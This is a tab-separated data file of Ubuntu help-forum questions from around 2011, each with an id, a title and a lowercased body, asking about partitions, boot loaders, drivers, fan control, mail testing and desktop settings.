59928	how can i move /var to another harddrive ?	i 've put a new ssd as /dev/sda , the old hd as /dev/sdb . and done a fresh installation as one partition on /dev/sda1 . the main quirk in my set-up is that i do n't want to repartition the old hd , since it 's got lots of data on it . since i had a swap partition on the hd before , i 've put that into fstab . i 've also mounted the hd . and /tmp ( and /tmp/var ) are in tmpfs . but , how can i go about moving /var to the hd ? i can junk the old one ( currently sitting under root at /dev/sdb5 , and /mnt/hd ) . doing a simple ln -s /mnt/hd/var /var does n't seem to work . is this something i need to do with mount -o bind ? i 'm asking because the `` attempt , fail , recover '' cycle time is pretty long .
59935	what are the hotkeys to find the next and previous occurrence of a search term in man and info ?	let 's say you wanted to search the documentation for mplayer : # man mplayer to search for `` length '' you would type `` /length '' while in man and press enter . to go to the next occurrence of `` length '' you would type `` n '' . what is the hotkey to get to the previous occurrence of `` n '' ? and what are the hotkeys to get to the next and previous occurrences of a search term in info ? # info mplayer
59941	does ubuntu one support socks 5 ( ssh tunneling ) ?	i can not make the ubuntu one to run under ssh tunneling ( dynamic port forwarding ) . does it support ssh tunneling ? if yes , how to set it up , thanks .
59943	how to switch between ubuntu and windows 7 without a reboot	i have installed windows 7 and then ubuntu 11.04 . now i want to know how i can switch from ubuntu to windows 7 and from windows 7 to ubuntu without restarting the computer .
59946	how to copy file to another machine through terminal ?	i have ubuntu 10.04 running through vmplayer . and i have another machine ( asus rt-n16 router ) . i am able to connect to the router with telnet and see its file system . how can i copy the file from the local machine ( file is /home/user/helloworld-c ) to the router ( folder */tmp/mnt/discb_1* ) ?
59950	can i run a java 32-bit application on a 64bit system	natty 64-bit is installed . imindmap 5 a java 32 program will not run correctly . is installing 32-bit java a possible solution ?
59952	resolv.conf only to be editable by root	what should i do to make /etc/resolv.conf only editable by root ? i do n't want anything to edit it after i specify my own dns servers , i.e . only editable by the user with root privileges .
59956	can emerald do translucent ( blurred ) window borders ?	emerald is a nice window decorator , and i am using it with compiz . however , i see no option in the emerald settings to make decorations translucent ( i.e . blurred backgrounds ) , only transparent ( see-through ) . it would be nice to have the content behind the decorations blurred , especially for titlebars , because otherwise , when the text overlaps , it often looks confusing . you can sort of work around this with different colours , but then again , translucency is so nice ! does such an option exist ? if so , how can it be set ?
59957	how do i get the ruby prompt with ruby 1.8 package	i have installed ruby1.8 and ruby1.8-dev packages but it doesnt respond to the ruby command at the command line . ruby the program 'ruby ' is currently not installed . you can install it by typing : sudo apt-get install ruby irb the program 'irb ' is currently not installed . you can install it by typing : sudo apt-get install ruby i am just a little concernted that installing ruby will install a different version .
59962	hdmi on tv with i3	since i 'm still pretty green on hardware-setup in ubuntu , i 'd love some help on configuring my new htpc . i got an `` old '' 32 '' hd-ready ( 1360x768 ) tv which i 'd like to use as monitor . problem is , this tv is not sending the correct data through hdmi . ( edid ? ) i tried to manually configure x with different modelines , however i 'm pretty sure i got the correct one now . my /etc/x11/xorg.conf looks like the following now : section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1360x768 '' endsubsection endsection section `` monitor '' identifier `` configured monitor '' modeline `` 1360x768 '' 85.50 1360 1424 1536 1792 768 771 778 795 -hsync -vsync endsection is this the right way to configure x ? anyways , i tried restarting gdm but it does n't change a thing . i should probably mention , that most of the time my tv does n't even display an image at all . when it does , its for a few seconds at a time , with lots of flickering and using just 2/3 of the screen width ( with analog tv on the last bit ) . setting different modelines and restarting x does n't seem to make any difference . i also tried logging in to the remote desktop , but i see that resolution does n't change at all there . ( .. which it does , if i put the hdmi in a pc monitor instead ) any thoughts , and is this even the correct way to configure x these days ?
59964	skype tray icon goes outside of tray when clicking `` workspace switcher ''	is that normal ? does it happen for everybody ?
59968	recover accidentally removed files on ntfs partition	i accidentally removed some files on a ntfs partition how can i recover them staying inside linux without0 rebooting ?
59972	how to compile openzwave-control-panel ?	trying to compile openzwave-control-panel . but getting the following error : user @ ubuntu1004desktop : ~/openzwave-control-panel $ make g++ -o ozwcp -g ozwcp.o webserver.o zwavelib.o ../libmicrohttpd/src/daemon/.libs/libmicrohttpd.a -pthread -framework iokit -framework corefoundation g++ : ../libmicrohttpd/src/daemon/.libs/libmicrohttpd.a : no such file or directory g++ : iokit : no such file or directory g++ : corefoundation : no such file or directory make : *** [ ozwcp ] error 1 ( yes , i have libmicrohttpd , but there is no .libs folder ) also , i can not configure the sources : user @ ubuntu1004desktop : ~/libmicrohttpd $ ./configure bash : ./configure : no such file or directory how to compile that ?
59973	can i have both unity 2d and gnome 3 sessions available ?	i do n't mean i want to run both gui 's at the same time . i mean if i can install gnome 3 and have unity-2d which i can change back and forth at any time by logging out and logging back in deciding what session gui i want . i am running ubuntu 11.04 with unity 2d on an acer aspire one netbook .
59974	how to mount / with encrypted lvm root during installation ?	in order to understand linux better , i 'm trying to manually configure an encrypted root lvm partition . i have already tried this with the ubuntu server installer by choosing the lvm encrypted option and it worked . my problem is simple , i have created a /boot partition ( not encrypted ) and an encrypted root partition but the installer ca n't find a root partition . i think that i have to mount the / partition . how can i do that ?
59977	how do i upgrade all symbol packages ?	when submitting apport reports to launchpad , i regularly get the error `` outdated debug symbol package '' from the retracing service . how can i upgrade all debug symbol packages to the latest version ? they do n't seem to upgrade with regular updates through update-manager .
59978	lightdm is running but does not display on login	lightdm is installed and running by default as a part of the beta release . yet , lightdm is not displayed at login time , rather a primitive , gdm like manager is the one we find at login time . i tried the command sudo dpkg-reconfigure lightdm which gave the result : dpkg-maintscript-helper : warning : environment variable dpkg_maintscript_name missing dpkg-maintscript-helper : warning : environment variable dpkg_maintscript_package missing while , sudo stop gdm gives stop : unknown job : gdm ( as gdm is not installed in the beta release ) sudo start lightdm gives start : job is already running : lightdm so now , how do we make lightdm appear at login time ?
59981	how do i add ( mail ) programs to the messages indicator ?	i am running ubuntu 11.04 with unity , i just wonder why gnome-default-applications-properties only show me the evolution program . there was no customize option before ? just would like to launch google email from the messages indicator . thanks .
59983	i receive a warning that ubuntu desktop can not be installed , when upgrading to 11.10 beta . is it safe to upgrade ?	
59985	installing fresh ubuntu on another partition from a wubi installed ubuntu	i have installed ubuntu with wubi on a windows xp partition ( /dev/sda1 ) . i had an ubuntu install ( 8.04 ) which failed to upgrade on /dev/sda2 . but now , i have three layers of boot managers stacked : old grub on mbr , gives me choice to winxp or old ubuntu windows boot selector ( do n't know its official name ) , gives me choice between real xp and new ubuntu new grub , list all the available systems . i would like to install a fresh ubuntu on another partition ( eg . overwriting the old install , i got dedicated partitions for /home and do not care about wiping out the old install ) , which is easy enough when you have a cd . problem is i do not have a cd and i can not convince my bios to boot from a usb device . i did a little search on this site and google , and asked the same question in french on ubuntufr , and this seems to be impossible . this question is close to what i am looking for but not quite , and i really find this limitation strange : i would think that it should be possible to install a complete system without repartitionning , then configure boot system to point to this new root . here is a detailed description of the system 's partitions ( using script in this post , description is in the first post of the topic ) : post on ubuntu-fr thanks for your help , arnaud
59987	ca.pl missing , how do i reinstall it ?	i run ubuntu 10.04 . was recently trying to configure postfix with gmail . but ca.pl is missing from /usr/lib/ssl/misc/ . i tried out the command /usr/lib/ssl/misc/ca.pl -newca what should i do now ?
59994	not able to download anything on software center	i started with ubuntu just about 3-4 hours ago . i did only install it for some software-developement purposes ( ruby , phyton , perl , etc. ) . when i 'm going to get any kind of applications over the ubuntu software center , i 'm not able to install everything . the `` install '' -item in the topmenu is always locked..i only receive the following sentence , when i 'm going to get more information about a application : 'available from the `` main '' source ' - use this source nothing happens after clicking on 'use this source ' . if u need any further information , please tell me . thanks in advance , maxi
59999	rackspace , heartbeat ip failover	i have tested tomcat specific clustering with apache mod_jk and mod_proxy on ubuntu local vms for our website high availability and load balancing . the real servers are hosted by rackspace cloud server provider and i should implement this on cloud servers once completely done . i tested tomcat clustering with 1 load balancer and 2 web servers . as single load balancer is again a single point of failure , i 'm trying to add one more lb as slave . in rackspace there is an option load balancers and here is the link which guides how setting up load balancer which i am not sure to setup because of some doubts as i never did this before anytime . i heard rackspace offers to share an ip between computers , is that so ? , then i can use this option . i am trying heartbeat configuration on the load balancers and the way i followed from the link seems to work for a site . i have the following doubts here : i think i should use public ip address in the place of virtual/floating ip which is shared and also to which the site domain is pointed , is that so ? . how could i configure heartbeat for multiple web sites as we have more than one site hosting ? . i will specify public/shared ip as virtual ip by eth0:0 in the network interface file on both the load balancers . do you really think it works flawless even if specified the public ip as virtual ip with eth0:0 interface without any interruption ? again i just gave a glance of other links link1 , link2 and got confused which one to follow to host multiple webistes with ip failover . does anyone tell me which link suits best for my requirement ? finally my goal is to have ip-failover ( master slave ) for load balancers and need help on configuring heartbeat for multiple websites ( may be pointing site domains to shared ip does the work ? ) . if we successed , we can share the success just by telling you 'thank you very much ' . thanks in advance !
60004	ubuntu software center not recognising my network connection	i have installed oneiric beta on my laptop . as my mobile broadband refused to connect to internet through network manager i 'm now using wvdial to connect . hence the network manager shows i 'm not connected to any networks . when i try to install software from ubuntu software center the 'install ' option remains disabled and under reviews section it says no network connection ! as a workaround i kept installing applications from terminal which works fine . therefore , my question is how to make software center recognize that i am connected to internet ?
60022	how do i uninstall all instances of java and blacklist it from being installed again ?	for security reasons i want to remove/uninstall all instances of java from my computer and prevent it from being installed again . on windows computers i would simply just not install the software found at this webpage : http : //java.com/en/download/manual.jsp but on ubuntu i 've noticed that java seems to have gotten installed on my system without my explicitly doing it and it shows in several ways , e.g. , through plugins , etc . what java software on ubuntu is the equivalent of having installed the software at http : //java.com/en/download/manual.jsp on windows ? will uninstalling one `` java-named app '' uninstall everything java related on my computer ? how do i blacklist java so that it is n't installed again ?
60031	how to enable the hibernate option ?	i am not getting hibernate option in ubuntu 10.04 . can anyone say what the problem might be and how to resolve it ? ( btw i tried this https : //help.ubuntu.com/community/swapfaq but it did n't work for me )
60038	how can i easily install indicators for lxpanel ?	i 'm running ubuntu 10.04.3 server edition and i need to get the indicator applets for lxpanel . i 've tried looking through http : //packages.ubuntu.com , but the package for lxpanel indicators is only for maverick and above , and i do n't want to get caught in dependency hell . is there any way i can easily install indicators for lxpanel in lucid ?
60039	projector and external display not detected - driver issue ?	i 'm using a panasonic cf-29 toughbook . ubuntu acts like it does n't have the drivers to operate my graphics card neither on the internal side nor the external . what i 'm getting at is when i had debian i was able to control the resolution of my internal display , and in ubuntu all the options are disabled like it 's a generic monitor . also when i try to plug in and external display or projector it does n't detect an external device even if i select the automatic detect icon . i know that the external vga plug was working with debian . so based on what i was able to do with debian compared to what i 'm unable to do in ubuntu makes me think that it 's a driver issue . and i was wanting help with figuring out what drivers i need to activate or install .
60041	why is n't vim reading my global configuration file ?	i put 'start ' in ~/.vimrc , and my vim starts in input mode . i put 'start ' in /etc/vimrc , and nothing happens , for any user , including root . how do i fix this ? update : per queueoverflow below , i consulted : help system-vimrc , which i interpreted to mean that the most common path is indeed /etc/vimrc but the system is actually computing that from $ vim/vimrc . echo $ vim produces blank output for both a normal user and for root . this is a fresh ubuntu 10.04 lts installation , did i do something wrong ? i installed vim with sudo apt-get install vim .
60042	dual boot windows 7 and ubuntu 11.04 , black screen when loading windows	i am proficient with windows and not so much with linux . here is my story : original system came with windows 7 , got opensuse installed on the second hard drive , and dual boot for this setup worked fine . wanted to switch to windows 7 and ubuntu 11.04 dual boot so i did a windows system recovery and it appeared to give me back a fresh windows 7 install . i then go to install ubuntu 11.04 and the installer informs me i have multiple operating systems already installed . i go to the advanced partitioning option and sure enough windows 7 is on /sda while opensuse is still on /sdb . from here i followed this guide ( how to dual-boot linux and ubuntu with two hard drives ) after i had deleted all the opensuse partitions on /sdb through the allocate drive space tab of the installer . i make the /boot , swap , / , and /home partitions and set the grub into the mbr of the second disk ( /dev/sdb ) . everything installs fine . i reboot , windows loads automatically , install easybcd and add an entry for ubuntu into the windows boot manager while assigning the type as grub2 . reboot the system and it now shows dual booting options for both windows and ubuntu . problem is : while i can use ubuntu fine when i try to boot into windows it just gives me a black screen and after a little while the fans start running crazy . if i restart the computer i will sometimes get the message that my system was put into hibernation mode because the temperature got too high ( 90c ) which i presume is in accordance with the fans going crazy . i have linked the output from the boot info script below , any suggestions on how to fix this issue would be greatly appreciated ! updated script output boot info script output : http : //paste.ubuntu.com/682152/
60043	why ca n't i access nike plus	every time i download nike plus it just sits in my download box , why does n't my nike+ download automatically
60044	how do i change the font dpi settings ?	i installed oneiric on a clean system , and found that the font tab is gone from the appearance settings . this is a problem , because by default the text in ubuntu is too large . i changed the text from normal to small in the universal access settings , but then it was way too small . i also tried it this way , but it does n't appear to have any effect . how can i get back the fine control and change my dpi from 96 to 90 ?
60045	how can i share my internet connection through usb ?	is there a way to share an internet connection from pc ( wlan0 interface ) with an android phone connected through usb ( usb0 interface with usb-tethering ) ? i guess it 's possible with squid , but i do n't know anything about squid . i 'm using froyo & ubuntu 11.04 so please guide me .
60048	controlling fan speed on h67n-usb3-b3	i recently got a new computer with a h67n-usb3-b3 motherboard . when running sensors-detect , it does n't detect the fan controller , only the cpu temp probes . for that reason , running pwmconfig returns that no pwm-capable sensor modules are installed . the fans are running all the time on the machine . is there a way i can control the fan speed or even stop them occasionally ?
60054	who is owner of incrond file products ?	consider this command : sudo incrontab ~/incron-config where ~/incron-config contains : /home/zetah/documents/incoming in_create , in_moved_to /home/zetah/scripts/do_something.sh $ @ / $ # and do_something.sh consists of : # ! /bin/bash python /home/zetah/scripts/py_something.py `` $ 1 '' python script accesses some online services and produces 3 new files . they are owned by root . why is that and how can i change this behavior . i want to be the owner of those product files thanks
60056	how to show window switch bar at the bottom like microsoft windows ?	besides disable launcher , is there any other way to do this ? i am using 11
60057	anybody know how to get the eyedropper tool to work in the gimp when running ubuntu 11.04 in virtual machine from 7 ?	sorry this is so long . if you do n't care why i need to run gimp inside a virtual machine when i could just run it in windows , or just want to take my word for it when i say that i have no other choice , you can scroll down to the section labeled `` the problem '' . introduction i might be the only person on the planet who relies on being able to use gimp from an ubuntu 11.04 install inside a virtual machine ( openbox ose ) from windows 7 , but this is my situation . i work for a small company which has a shared computer for use by myself and several coworkers . although i have a major project on the back-burner which sees the company switching over to linux and implementing a more integrated system , windows 7 is currently required for the business 's use of microsoft access . my coworkers would n't even know how to spell `` linux '' and do all their work from windows . i have n't really used windows in about 4 years other than when using and maintaining the access databases at work - all of my personal computers run ubuntu and i 'm much more efficient in that environment . i 'm a heavy user of desktop spaces and really have trouble being constrained to the single workspace when running gimp in 7 , and have trouble remembering where to look for files ( `` my documents '' vs `` home '' ) . for that reason ( and because i 'm testing other applications for future use by the business ) i have ubuntu 11.04 installed in virtualbox ose in which i spend a great deal of time during my shifts . the ability to minimize ubuntu and return to the windows environment is unfortunately required as i often need to make use of access . i use gimp to create various advertisements , logos , and other media for the business . i do this in addition to the same work my coworkers are doing so my time for such projects is extremely limited . the problem : when i run gimp in ubuntu 11.04 ( untested with previous versions of ubuntu ) inside a virtual machine , it seems that the gimp eyedropper tool thinks my entire screen covered by the default natty wallpaper and when i use the tool all i get is purple . fuzzy select and other tools that require colour recognition do work properly , however . i think this is more to do with how virtual box ose displays the desktop rather than an issue with gimp itself . i 've seen brief flashes of the natty wallpaper ( not the one in use , by the way ) , most predictably replacing drop down menus when ram is low-ish ( drop-down box is proper size but displays a piece of the wallpaper instead of the menu ) . has anybody else noticed this and/or know of a way to fix it ? it 's really hard to match colours by just `` eying it '' ! : p running ubuntu 11.04 64bit ( unity de ) in virutalbox ose v4.0.12r72916 ( latest ) , gimp 2.6.11
60059	how to search the contents in a directory from terminal while you 're in the middle of writing a command ?	i 'm trying to become comfortable with the terminal by using it as much as i can . the aspect of my computer usage where i lose most time using command line instead of the gui is when i try to find a song i am interested in . my music folder is structured like so music- > bands- > albums- > songs i often forget what album a song is in but i always remember what band played that song . i do n't search for the song from the music directory because it takes too long to find a song ( i have a lot of music ) so i search for the song after i get to the band directory . right now in command line i have # totem /home/user/music/red\ hot\ chili\ peppers/ but i forgot what album the song `` dani california '' is in ( totem is a music player in gnome . ) the quickest way for me to get around this is to get inside the red hot chili peppers folder in the file manager gui and hit ctrl+f and type `` dani california '' . is there a way i can search the contents in a directory from terminal while i 'm in the middle of writing a command ? or do you have any recommendations on how i can most quickly achieve the same goal i do in the gui from the command line ?
60062	how do i fix a download issue when updating ?	for some reason every time i try to update by terminal , synaptic , and update manager i get this error message and i can not update all the data i need . w : failed to fetch cdrom : //ubuntu-netbook 10.04 _lucid lynx_ - release i386 ( 20100429.4 ) /dists/lucid/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu-netbook 10.04 _lucid lynx_ - release i386 ( 20100429.4 ) /dists/lucid/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch http : //ppa.launchpad.net/canonical-dx-team/une/ubuntu/dists/natty/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/canonical-dx-team/une/ubuntu/dists/natty/main/binary-i386/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/lorenzo-carbonell/atareao/ubuntu/dists/natty/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/lorenzo-carbonell/atareao/ubuntu/dists/natty/main/binary-i386/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/meebey/ppa/ubuntu/dists/maverick/main/binary-i386/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/team-xbmc/ppa/ubuntu/dists/natty/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/team-xbmc/ppa/ubuntu/dists/natty/main/binary-i386/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/ubuntu-desktop/gnome3-builds/ubuntu/dists/natty/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/ubuntu-desktop/gnome3-builds/ubuntu/dists/natty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
60066	is there a utility similar to `` apt-file '' that can search source packages ?	i 'm looking for a utility similar to apt-file that allows me to search the contents of source packages for certain files , rather than just binary packages . is such a utility available for ubuntu ?
60069	disable touch on bamboo touch & pen cth-460	running ubuntu 11.04 . got a bamboo touch & pen cth-460 and it works out of the box . the pen response works great but the finger response is horrible . is there a way to disable the finger response and only have the pen work ? the tablet clearly differentiates between the two , so there should be a way to disable one . any thoughts ?
60071	how to forward-search-history with the reverse-i-search command ( ctrl+r ) ?	in the readline manual # man readline the following describes how to search backward and forward . reverse-search-history ( c-r ) search backward starting at the current line and moving `up ' through the history as necessary . this is an incremental search . forward-search-history ( c-s ) search forward starting at the current line and moving `down ' through the history as necessary . this is an incremental search . when i hit ctrl+r and type `` apt-get '' , i 'm able to do a reverse-search-history by continually tapping ctrl+r . but then i tap ctrl+s and the terminal does not go forwards . am i doing something incorrect ? also what key does the meta prefix `` m- '' represent ?
60075	looking for a script/tool for moving files and subfolders to directory by year	i got a lot of data over the years , and i 'm looking for a tool that can get a folder name and then move all the files to subfolders by year , like : 2005 2006 2007 etc.. anyone knows something or similar tool ?
60076	sendmail and local mail server ?	for testing emails i do n't want to actually send an email out ( and ca n't anyway as isp blocks port 25 ) . i have installed sendmail , and what i want to do is install a mail server on the same pc that is sending the email which i can simply send the emails to , and receive them on my pc . so i am looking for a couple of guides . install and configure sendmail correctly for this . install and configure a mail server correctly for this . setup mail client ( evolution ) to connect to the mail server can anyone help with this ?
60077	which programs use the new `` online accounts '' ?	in ubuntu oneiric 11.10 it 's possible to configure a google online account . i 'm able to configure this program to get access to mail , contacts , calendar and chat . but which programs use this data ? there is no information about that . after i configured my google account , i supposed that i will be able to use google chat with empathy , or that i will be able to access my contacts and calendar in thunderbird . but none of this is true . so , how does ubuntu use the configured google accounts ?
60078	laptop 's hard drive does n't really spin down	i have a new laptop with dual boot to both windows 7 and ubuntu 11.04 . while in ubuntu , the laptop gets significantly warmer than in windows . my suspect is the hard drive , because i feel it 's especially warm above it , and also i believe i feel its vibrations constantly , even when i 'm doing nothing with the hard drive and its led is off . ( btw , i checked , and `` spin down hard drives when possible '' option is checked . ) whenever i try : hdparm -c /dev/sda i get : drive state is : active/idle and the interesting thing is , when i tell it to sleep : hdparm -y /dev/sda it says : issuing sleep command and i can actually feel it stops spinning , but only for a couple of seconds . ( it goes back spinning without me triggering anything ) my question is , what can i do to make my hard drive calmer ? ( it 's a sata 500gb 7200rpm )
60079	how do i synchronize thunderbird with google contacts	at the moment i 'm testing ubuntu onieric . i always used evolution as my email client , but now i would give thunderbird a chance . but i could n't find a way to synchronize my google contacts with thunderbird . what is the preferred way in ubuntu to do this ? the add-on do n't work with thunderbird 7 : https : //addons.mozilla.org/en-us/thunderbird/addon/google-contacts/ thunderbird eds contacts integration is n't available in the repos : https : //launchpad.net/thunderbird-eds-extension the new online account settings does n't have any impact here : which programs uses the new `` online accounts '' so what 's the right way to synchronize my google contacts information with thunderbird on ubuntu onieric 11.10 ?
60083	ca n't add medibuntu to the software center	i am trying to add the medibuntu repository to show in the ubuntu software center . i am running ubuntu 11.04 and i followed the instructions here . but still i am unable to see the medibuntu repository and get software from it through the ubuntu software center . the medibuntu repository is installed i just cant use it through the software center .
60084	grub menu entry to boot *ubuntu	goal : have a grub menu entry which will boot *ubuntu on a usb stick . constraints : grub , not grub2 . currently trying with kubuntu 10.04.3 , but any other flavour/version will be accepted . at this moment , file menu.lst is as follows : default 0 timeout 15 # # kubuntu menu entry title kubuntu root ( hd0,1 ) kernel /casper/vmlinuz root=uuid= < uuid > ro quiet splash initrd /casper/initrd.lz where < uuid > is replaced with the uuid of the ( hd0,1 ) partition , in which i have copied all the contents that are inside the kubuntu iso file . when i boot , it shows up a pink splash screen ... http : //scr3.golem.de/screenshots/1003/ub_1004b1/thumb480/01_ubuntu_1004_beta.png ( ... i can hear the cd drive doing something , though the live cd is not therein ) ... and then it stops booting , and brings me to a busybox command line because `` no init found . try passing the init= bootarg . ''
60085	`` authentication failed '' when trying to upgrade from 10.04 to 10.10	i get the following error message when trying a network upgrade from 10.04 to 10.10 : authentication failed . authenticating the upgrade failed . there may be a problem with the network or with the server i googled that error and found one proposed solution : gpg -- keyserver keyserver.ubuntu.com -- recv 437d05b5 gpg -- export -- armor 437d05b5 | apt-key add - however , this seems to have screwed up at least one guy 's system . is there any safer way of solving this ( besides doing a fresh install ) ?
60087	lm-sensors not recognized my laptop hardware fan	i have hp pavilion dv6 3031-et notebook ; i was install ubuntu this version 4 weeks ago everything fine my video card , sound , battery , etc fine but i have wan na check my fan speed result is ; acpitz-virtual-0 adapter : virtual device temp1 : +68.0°c coretemp-isa-0000 adapter : isa adapter core 0 : +67.0°c ( high = +95.0°c , crit = +105.0°c ) coretemp-isa-0002 adapter : isa adapter core 2 : +64.0°c ( high = +95.0°c , crit = +105.0°c ) lspci ; result ; 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 vga compatible controller : ati technologies inc redwood [ radeon hd 5600 series ] 01:00.1 audio device : ati technologies inc redwood hdmi audio [ radeon hd 5600 series ] 02:00.0 network controller : ralink corp. rt3090 wireless 802.11n 1t/1r pcie 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 7 f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 7f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 7f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) what am i have to do for this sensors result i wan na all temparature and fan speed thank you
60091	transfer files from ubuntu to a windows 7 system on the same network	i do n't know about samba and stuff , and i do n't care to share files on the network either . i just want to copy/move an iso file form ubuntu ( the cd drive is not working ) to a windows 7 computer where i can safely burn it .
60094	compile 32 bit on 64 bitsystem	i 'm trying to compile a 32 bit version of python on a 64 bit ubuntu system with the following configure command : cc= '' gcc -m32 '' ldflags= '' -l/lib32 -l/usr/lib32 \ -lpwd/lib32 -wl , -rpath , /lib32 \ -wl , -rpath , /usr/lib32 '' \ ./configure -- prefix=/opt/pym32 then make , make install . no errors , but it should be something wrong because a `` readelf -h python '' tells me that python was build as a elf64 instead .
60095	radeon hd 5800 , ubuntu 11.04 , proprietary driver installed , graphics not displaying properly	i have a radeon hd 5800 ( not sure how to find out which ) and i have the proprietary driver installed . i can watch movies , etc , and play some games , but i do n't think the 3d part is working properly ? i want to play guild wars and i 've installed it ok , but it does n't display the log on screen , only the graphics behind it . wine site says it 's platinum and should run fine and to check other games . supertuxkart also uses 3d and wine suggested i test that before `` blaming '' it , and sure enough it does n't work . so i 'm stumped - i 'm not after help running the games so much as how can i make sure my graphics card works properly ?
60096	what start up scripts are executed when a terminal is opened in ubuntu ?	when i open a terminal , it says can not execute the binary file and the output is something like this , bash : /home/sandeep/bin/uname : can not execute binary file bash : [ : = : unary operator expected bash : /home/sandeep/bin/sed : can not execute binary file bash : /home/sandeep/bin/ls : can not execute binary file this is followed by normal prompt where everything is fine . but as a programmer it is annoying to see those many errors every time you open a terminal . the reason i found out is that when i installed a armeabi tool chain it created a folder called bin in the home directory and all the executables inside this directory are for arm processor . but my terminal when it is being opened it is trying to execute these arm binaries and hence it shows an error that these binaries can not be executed ( since my proc is not arm ) . to solve this i can remove this folder ( i tried it and it worked ) but thats not the optimal solution . i want to know the script that is getting executed when i open a terminal where it is trying to execute wrong binaries at the launch . i had a look at ~/.bashrc but there is nothing relevant to my problem in that .
60097	how to install gnome-shell ?	what is the easiest way to install gnome 3 and gnome-shell in beta 1 of 11.10 ? also is it worth doing and is it stable enough to do so ?
60099	unable to start on a hp pavilion dv6-3049tx	i am using the latest version with advanced feature of ubuntu os i.e ubuntu 11.04 . here the some description what exactly i am suffering from . when i start the ubuntu os after installation for the very 1st time it starts completely with no error but during 2nd start-up the screen becomes black and then the error script starts & it goes on . the error list is so large that its difficult to post it here , but in short i can say that the error is regarding my drivers and hardware . if you want more information i will try to post here .
60108	unity + hd 4250 = not a good idea ?	i have been using 11.04 on my compaq presario cq56-116so . i have used ubuntu from 9.10 version , and all have been working perfect , no lag etc . but now , when the 11.04 was released , i installed it , i installed my ati drivers ( i play games like urban terror so i need those drivers ) but oh my god ! all lags in 11.04 ! well when i do n't have any programs running it doesnt lag , but when i open apps like nautilus , amsn , etc. , and they are open at the same time and when i move windows it lags like hell , and this will piss me . i never had lag with other versions ! i even tried to use classic desktop , all lags there too , same bad peformance like in unity . what is wrong with 11.04 , why it lags with an hd 4250 ? in older versions all worked without lag , effects etc. , no lag . but the 11.04 is a pain . any fix for this ? disabling vsync and detect fresh rate makes it run much better , but i still have huge lags . hope the 11.10 fixes this . when i buy a new computer i 'm gon na buy a computer with an nvida graphics card , my friend got an 8800gt and he do n't have any lag in unity . i even have tried 11.4 ati drivers , no help .
60111	how can i fix/troubleshoot suspend not working with a macbook pro and 11.10	i 'm using a macbook pro and i recently upgraded to the 11.10 beta . suspend no longer works . when i close the laptop lid , i can tell the screen turns off momentarily , but then comes back on . when i open the lid , it 's at the unlock screen . the same things happens if i select suspend from the power menu . what can i do to troubleshoot or fix this ? i realize that i 'm using beta software , but i 'm not sure where to get started working on something like this .
60112	how do i change the background image on a single workspace ?	i would like a different background for each of my workspaces- is this possible ? thanks , colleen
60115	how to find full path of device i 've connected ?	i have usb device , which is actually identified as serial device by ubuntu 10.04 . how can i find its full path ? ls -la /dev/ shows a lot of devices . how to choose correct one ?
60116	devanagari font problem - vedic accents	i have installed all devanagri language support packages i can think of , and it works fine most of the time . but , it does not display vedic accents properly : for example , from here : अ॒ग्निः पूर्वे॑भि॒रृषि॑भि॒रीड्यो॒ नूत॑नैरु॒त। the anudattas are not displayed properly on both firefox and chrome . how do i fix this ?
60120	what kind of content is in the canonical partners repository ? is it as secure & safe as the main repo ?	in software sources under the other software tab , there is an option of enabling `` canonical partners '' repository : software packaged by canonical for their partners . do i understand correctly that this repo includes third-party created applications that by arrangement are packaged and maintained by canonical ? does this mean canonical can look at the source code of these third-party applications and hence ensure the security and stability of these apps in ubuntu , making them as secure & stable as the software in the main repo ?
